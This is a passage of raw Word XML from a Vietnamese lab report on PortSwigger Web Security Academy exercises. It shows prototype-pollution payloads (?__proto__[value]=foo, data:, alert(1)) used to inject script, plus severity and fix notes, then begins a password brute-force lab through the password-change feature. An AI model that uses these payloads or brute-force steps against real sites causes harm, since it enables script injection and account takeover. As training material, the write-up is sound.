        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> bất kỳ dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>ầu v</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>o JSON n</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>o. V</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> dụ: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?__proto__[foo]=bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BEC93" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00953663">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD03F13" wp14:editId="72107931">
            <wp:extent cx="6115050" cy="3150235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="825445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45307" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId187"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3150235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F92E8" w14:textId="40330049" w:rsidR="00F67FB2" w:rsidRPr="00664855" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:t xml:space="preserve">hực hiện Inspect trang web và tìm file </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>earchLoggerConfigurable.js</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:t xml:space="preserve"> và nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC3828C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00953663">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D063CF7" wp14:editId="735DCCC8">
            <wp:extent cx="6115050" cy="4320540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="237819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19996" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4320540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373EFCB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Line 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> đối tượng config có thuộc tính </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transport_url</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> và thuộc tính này được sử dụng để tự động thêm tập lệnh vào DOM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C3000B" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Line 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> Phương thức tĩnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> xác định một thuộc tính mới trực tiếp trên một đối tượng hoặc sửa đổi một thuộc tính hiện có trên một đối tượng và trả về đối tượng nhưng hiện tại thuộc tính transport_url chưa định giá trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E59E85" w14:textId="6928F66F" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:r w:rsidRPr="00294367">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> Do vậy, ý tưởng tiếp the</w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t xml:space="preserve">o là </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve">sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>chèn giá trị vào thuộc tính transport_url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF217E" w14:textId="182DA3E5" w:rsidR="00F67FB2" w:rsidRPr="00953663" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00953663">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00953663">
        <w:t>hèn được script có source là “</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00953663">
        <w:t>” vào DOM</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AB1C49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?__proto__[value]=foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4BC0E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00953663">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70861B00" wp14:editId="63C6C310">
            <wp:extent cx="6115050" cy="3002280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1977984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84247" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3002280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F6AC3" w14:textId="4335D1CC" w:rsidR="00F67FB2" w:rsidRPr="00AB1C49" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="003117B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="003117B0">
        <w:t xml:space="preserve">iêm vào </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AB1C49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data:, alert(1)</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="003117B0">
        <w:t xml:space="preserve"> để gọi url alert(1) </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="003117B0">
        <w:t>mở hộp thoại cảnh báo</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> và hoàn </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AB1C49">
        <w:t>thành thử thách này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF701E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00F77545">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B362496" wp14:editId="47267E49">
            <wp:extent cx="6115050" cy="1102995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="383066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66048" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1102995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CE7FF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422CE4D9" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00D3612A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00F77545">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AC790A9" wp14:editId="45056A94">
            <wp:extent cx="6115050" cy="1017270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1965684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84801" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1017270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F54300C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000F79BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mức độ ảnh hưởng của lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>High (cao) vì lỗ hổng này cho phép kẻ tấn công có thể tiêm mã độc vào ứng dụng thông qua việc chèn thuộc tính tùy ý vào đối tượng prototype, dẫn đến việc thực thi mã độc trong trình duyệt người dùng. Điều này có thể dẫn đến việc khai thác API, truy cập dữ liệu nhạy cảm, hoặc thực hiện các hành động không mong muốn trên ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC426AE" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00D3612A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Khuyến cáo khắc phục: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0CD7BF" w14:textId="58567741" w:rsidR="00F67FB2" w:rsidRPr="00BC4913" w:rsidRDefault="00F67FB2" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xử lý đầu vào cẩn thận:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4913">
        <w:t xml:space="preserve"> Kiểm tra và xử lý đầu vào từ URL và file JavaScript một cách cẩn thận để ngăn chặn việc chèn mã độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABDA204" w14:textId="6383023F" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cập nhật và kiểm tra mã JS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4913">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>Đảm bảo rằng mã JavaScript được cập nhật và kiểm tra kỹ lưỡng để ngăn chặn việc chèn mã độc hại và bảo vệ các API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEDC4C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc182429526"/>
      <w:bookmarkStart w:id="83" w:name="_Toc182909887"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>06</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7D45">
        <w:t>: Password brute-force via password change</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="55F898D5" w14:textId="0A023D9D" w:rsidR="00294367" w:rsidRDefault="00294367" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="039873F3" w14:textId="419EF36C" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>ồn tại lỗ hổng liên quan đến việc thực hiện tấn công vét cạn mật khẩu thông qua việc phản hồi khác nhau từ server khi thực hiện thay đổi mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4DD7D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1BE54" w14:textId="5095D26B" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>ruy cập vào task và nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F8604" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="005D3CEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD678AB" wp14:editId="6DE02E35">
            <wp:extent cx="6115050" cy="2331085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1574812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12375" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId193"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2331085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="354517B4" w14:textId="6F9BC0C7" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="005D3CEB">
        <w:t>ruy cập vào trang web và xác định thông tin đăng nhập. Sau đó</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="005D3CEB">
        <w:t xml:space="preserve">đăng nhập với tài khoản </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wiener</w:t>
      </w:r>
      <w:r w:rsidR="00294367">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="005D3CEB">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00294367">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>peter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> như sau</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB1C79" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="004F1EC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C598B48" wp14:editId="224135E1">
            <wp:extent cx="6115050" cy="2611755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="604044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44088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId194"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2611755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D701DC1" w14:textId="5CDE65E7" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="004F1EC6">
        <w:t>Tiếp theo</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1EC6">
        <w:t xml:space="preserve">thực hiện thay đổi mật khẩu </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">với việc </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD097D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nhập sai mật khẩu mới</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F1EC6">
        <w:t xml:space="preserve">và bắt gói tin </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>chứa thông tin yêu cầu đổi mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132601D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00DD097D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ABCC1B8" wp14:editId="76608688">
            <wp:extent cx="6115050" cy="3545205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1045522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22271" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId195"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3545205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="749DFAB2" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:r w:rsidRPr="00294367">
        <w:t>Và thực hiện forward:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA76769" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00DD097D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701615AD" wp14:editId="1A4A7ADF">
            <wp:extent cx="6115050" cy="4474845"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="433061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61550" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId196"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4474845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="103724F4" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả trả về là một thông báo với </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New passwords do not match</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBCA20" w14:textId="2EB28062" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> Thực hiện tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00294367">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>bằng cách</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">gửi gói tin mà </w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
